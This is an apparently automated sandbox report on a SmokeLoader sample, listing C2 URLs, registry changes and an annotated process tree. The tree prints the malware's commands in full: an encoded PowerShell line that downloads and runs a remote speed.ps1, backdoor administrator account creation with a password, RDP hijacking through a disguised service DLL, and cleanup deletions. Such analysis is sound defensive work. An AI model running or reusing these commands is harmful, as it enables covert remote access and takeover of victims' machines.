Analysis

max time kernel: 151s
max time network: 140s
platform: windows10_x64
resource: win10-en-20210920
submitted: 28-10-2021 15:54

Static task: static1
Behavioral task: behavioral1
  Sample: e5bda93ec7d8724ce496359c5e3efabe.exe
  Resource: win7-en-20210920
Behavioral task: behavioral2
  Sample: e5bda93ec7d8724ce496359c5e3efabe.exe
  Resource: win10-en-20210920
General

Target: e5bda93ec7d8724ce496359c5e3efabe.exe
Size: 185KB
MD5: e5bda93ec7d8724ce496359c5e3efabe
SHA1: ad9e1db817d0c69760155939c2fd633031f10418
SHA256: 0610000cdfda33355202ed75a2f542cf035207e5d26d5e4b11063a17cdcdc8be
SHA512: 53a1e16ab40c0173248b9adf8bb4ecf04fef532301581c63b3876803c8234185fedf4dd588d768e29b610dd5ecc62f933dd79427f086c89741768e5c8cfe9948
Malware Config

Extracted
  https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted
  Family: smokeloader
  Version: 2020
  C2:
    http://brandyjaggers.com/upload/
    http://andbal.com/upload/
    http://alotofquotes.com/upload/
    http://szpnc.cn/upload/
    http://uggeboots.com/upload/
    http://100klv.com/upload/
    http://rapmusic.at/upload/
Signatures

SmokeLoader
  Modular backdoor trojan in use since 2014.

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
  flow  pid   process
  52    1088  powershell.exe
  55    1088  powershell.exe
  56    1088  powershell.exe
  57    1088  powershell.exe
  59    1088  powershell.exe
  61    1088  powershell.exe
  64    1088  powershell.exe
  66    1088  powershell.exe
  68    1088  powershell.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoC)
  pid   process
  3988  3767.exe

Modifies RDP port number used by Windows (1 TTP)

Sets DLL path for service in the registry (2 TTPs)

YARA rule matches (the signature title for this table is missing from the extracted page; the columns are the report's own)
  resource                        yara_rule
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx

Deletes itself (1 IoC)
  pid   process
  3032  (name not recorded)

Loads dropped DLL (2 IoCs)
  pid   process
  3316  e5bda93ec7d8724ce496359c5e3efabe.exe
  3316  e5bda93ec7d8724ce496359c5e3efabe.exe
  (the process name is blank in the report for this signature; pid 3316 is named as e5bda93ec7d8724ce496359c5e3efabe.exe under EnumeratesProcesses and MapViewOfSection below)

Drops file in Program Files directory (4 IoCs)
  description                   ioc                                                                          process
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT     powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI     powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT   powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI   powershell.exe

Drops file in Windows directory (19 IoCs)
  description                   ioc                                                                                                   process
  File created                  C:\Windows\branding\mediasrv.png                                                                      powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png                                                                      powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png                                                                      powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1t1pc0hu.eqr.ps1    powershell.exe
  File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP                                          powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI98E1.tmp                                           powershell.exe
  File created                  C:\Windows\branding\mediasvc.png                                                                      powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tix554wn.3fr.psm1   powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9901.tmp                                           powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9922.tmp                                           powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat     powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd                                                                          powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9923.tmp                                           powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File created                  C:\Windows\branding\wupsvc.jpg                                                                        powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd                                                                           powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg                                                                        powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9902.tmp                                           powershell.exe
  (The ServiceProfiles\NetworkService paths show this powershell.exe ran as NETWORK SERVICE; the __PSScriptPolicyTest_*.ps1/.psm1 files are the probes PowerShell writes when it checks AppLocker/WDAC script policy.)
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  description     ioc                                               process
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  e5bda93ec7d8724ce496359c5e3efabe.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  e5bda93ec7d8724ce496359c5e3efabe.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  e5bda93ec7d8724ce496359c5e3efabe.exe

Modifies data under HKEY_USERS (64 IoCs)
  All 64 entries are in the hive of S-1-5-20, which is NT AUTHORITY\NETWORK SERVICE (written HKU\S-1-5-20 below instead of \REGISTRY\USER\S-1-5-20). That places the second-stage powershell.exe in the NETWORK SERVICE account, the one the script adds to Administrators. The keys themselves (Internet Settings zones, SystemCertificates stores, the Advanced INF Setup RegBackup entries) are consistent with first use of a profile by the IE/WinHTTP stack and CryptoAPI rather than deliberate configuration; only the ZoneMap key written by WMIC.exe breaks the pattern.
  description       ioc                                                                                                      process
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"   powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3                    powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"         powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"   powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs                                         powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople                                              powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0                               powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4                             powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"   powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2                    powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs                                                   powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot                                              powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates                                         powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing           powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Advanced INF Setup                                                           powershell.exe
  Set value (data)  HKU\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000   powershell.exe
                    (UTF-16LE backup of the Internet Settings "User Agent" value, which reads Mozilla/5.0 (compatible; MSIE 9.0; Win32))
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs                                                 powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"                 powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\  (value name blank in the report)   powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\                            WMIC.exe
  Key created       HKU\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople                                     powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"   powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"           powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates                                 powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"   powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"         powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates                                    powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"                  powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"   powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs                                                 powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"      powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."   powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"                  powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults             powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"   powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0                                powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"          powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"                powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"   powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"         powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"            powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"   powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"                  powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\  (value name blank in the report)   powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup                                  powershell.exe
  Key created       HKU\S-1-5-20\Software                                                                                         powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"   powershell.exe
  Set value (int)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"         powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"    powershell.exe
  Key created       HKU\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs                                           powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs                                            powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs                                         powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\  (value name blank in the report)   powershell.exe
  Set value (str)   HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"   powershell.exe
  Key created       HKU\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs                                                   powershell.exe
Modifies registry key (1 TTP, 1 IoC)

Runs net.exe

Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  description             flow  ioc
  HTTP User-Agent header  55    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  56    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  57    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  59    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  (This is the default User-Agent of the WinHttp.WinHttpRequest.5.1 COM object, so the downloads in flows 55 to 59 were made through that object from PowerShell, not through Invoke-WebRequest or .NET WebClient.)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   process                               entries
  3316  e5bda93ec7d8724ce496359c5e3efabe.exe  2
  3032  (name not recorded)                   62

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid   process
  3032  (name not recorded)

Suspicious behavior: LoadsDriver (2 IoCs)
  pid   process
  632   (name not recorded; listed twice)

Suspicious behavior: MapViewOfSection (1 IoC)
  pid   process
  3316  e5bda93ec7d8724ce496359c5e3efabe.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  All entries are powershell.exe; grouped by pid, in the report's order:
  600   SeDebugPrivilege
  1508  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36  (22 entries)
  1680  the same 22 entries as pid 1508
  596   the same list as pid 1508 up to and including 33 (19 entries; the report caps this signature at 64 IoCs, so the rest is cut off)
  The unresolved LUIDs 33, 34, 35 and 36 are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege. Enabling every privilege in the token at once, as pids 1508, 1680 and 596 do, is the pattern of a process that starts by turning on everything it holds; it does not by itself grant any privilege the token did not already have.

Suspicious use of FindShellTrayWindow (2 IoCs)
  pid   process
  3032  (name not recorded; listed twice)

Suspicious use of SendNotifyMessage (2 IoCs)
  pid   process
  3032  (name not recorded; listed twice)

Suspicious use of WriteProcessMemory (64 IoCs)
  Every parent-to-child write is recorded twice in the report (the two writes the sandbox sees per process start); the 32 unique pairs are:
  3032 (name not recorded)  -> 3988 3767.exe
  3988 3767.exe             -> 600 powershell.exe
  600 powershell.exe        -> 1748 csc.exe
  1748 csc.exe              -> 940 cvtres.exe
  600 powershell.exe        -> 1508 powershell.exe
  600 powershell.exe        -> 1680 powershell.exe
  600 powershell.exe        -> 596 powershell.exe
  600 powershell.exe        -> 3592 reg.exe
  600 powershell.exe        -> 3116 reg.exe
  600 powershell.exe        -> 3456 reg.exe
  600 powershell.exe        -> 3188 net.exe
  3188 net.exe              -> 2160 net1.exe
  600 powershell.exe        -> 3812 cmd.exe
  3812 cmd.exe              -> 2692 cmd.exe
  2692 cmd.exe              -> 2748 net.exe
  2748 net.exe              -> 3244 net1.exe
  600 powershell.exe        -> 2256 cmd.exe
  2256 cmd.exe              -> 2208 cmd.exe
  2208 cmd.exe              -> 2480 net.exe
  2480 net.exe              -> 2448 net1.exe
  928 cmd.exe               -> 3936 net.exe
  3936 net.exe              -> 1660 net1.exe
  892 cmd.exe               -> 836 net.exe
  836 net.exe               -> 1336 net1.exe
  4036 cmd.exe              -> 824 net.exe
  824 net.exe               -> 1968 net1.exe
  2652 cmd.exe              -> 1724 net.exe
  1724 net.exe              -> 1964 net1.exe
  2116 cmd.exe              -> 1848 net.exe
  1848 net.exe              -> 3248 net1.exe
  2384 cmd.exe              -> 1628 net.exe
  1628 net.exe              -> 2012 net1.exe
  (The six cmd.exe parents 928, 892, 4036, 2652, 2116 and 2384 have no recorded parent of their own; they are the parentless cmd /C net.exe chains in the process tree below.)
Processes

Indentation and the [n] prefix give the parent/child depth (the 1⤵ to 6⤵ markers of the original); each entry shows the image path, then the recorded command line, then the signatures that fired on that process.

[1] C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe
    "C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

[1] C:\Users\Admin\AppData\Local\Temp\3767.exe
    C:\Users\Admin\AppData\Local\Temp\3767.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.cmdline"
        - Suspicious use of WriteProcessMemory
        Note: csc.exe followed by cvtres.exe, with a random eight-character temp directory holding a .cmdline, a .0.cs and a .dll (all listed under Downloads), is what PowerShell's Add-Type leaves behind when a script compiles inline C#. ready.ps1 does this before it touches the registry.

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5010.tmp" "c:\Users\Admin\AppData\Local\Temp\2swqih2a\CSCBD3710FE722445B4ABAE1C68D47DEE80.TMP"

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (recorded three times; pids 1508, 1680 and 596 in the tables above)
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious use of AdjustPrivilegeToken
        Note: -s is PowerShell's server mode, and this exact command line is how Start-Job launches a background job host, so ready.ps1 runs part of its work as jobs.

    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        Note: moves the RDP listener to port 0x1C21 = 7201.

    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
        Note: TermService's ServiceDLL normally points at %SystemRoot%\System32\termsrv.dll. mediasrv.png is the UPX-matched PE written by the same PowerShell process (see the YARA table and Downloads); the .png extension is cosmetic, and the svchost that hosts TermService will load it as the service DLL the next time the service starts.

    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        Note: this is the policy "Use WDDM graphics display driver for Remote Desktop Connections", set to disabled.

    [3] C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
        Note: NETWORK SERVICE is the account the TermService svchost runs under.

      [4] C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe
          cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\net.exe
            net start rdpdr
            - Suspicious use of WriteProcessMemory
            (its net1.exe child appears further down as a parentless [1] entry)

    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe
          cmd /c net start TermService
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\net.exe
            net start TermService
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start TermService

    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        Note: clears the .ps1 and .txt files out of %temp%, where ready.ps1 and get-dnsprovider.PS1 (see Downloads) were dropped.
The entries below are top-level in the report, i.e. the sandbox recorded no parent for them. The net1 line is the missing child of the "net start rdpdr" chain above; the six cmd /C net.exe chains match the parentless cmd.exe pids 928, 892, 4036, 2652, 2116 and 2384 in the WriteProcessMemory table. Taken together they create the local account WgaUtilAcc, put it and RSSLLXYN$ into Remote Desktop Users, put WgaUtilAcc into Administrators, fingerprint the GPU and CPU through WMI, and fetch and run speed.ps1 from GitHub.

[1] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start rdpdr

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user WgaUtilAcc 000000 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc uc7YWrTP /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user WgaUtilAcc uc7YWrTP /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user WgaUtilAcc uc7YWrTP /add

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc uc7YWrTP
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user WgaUtilAcc uc7YWrTP
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user WgaUtilAcc uc7YWrTP
        Note: `net user NAME PASSWORD` with no switch resets the password, so the account ends up with the same password the /add step set.

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      wmic CPU get NAME

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
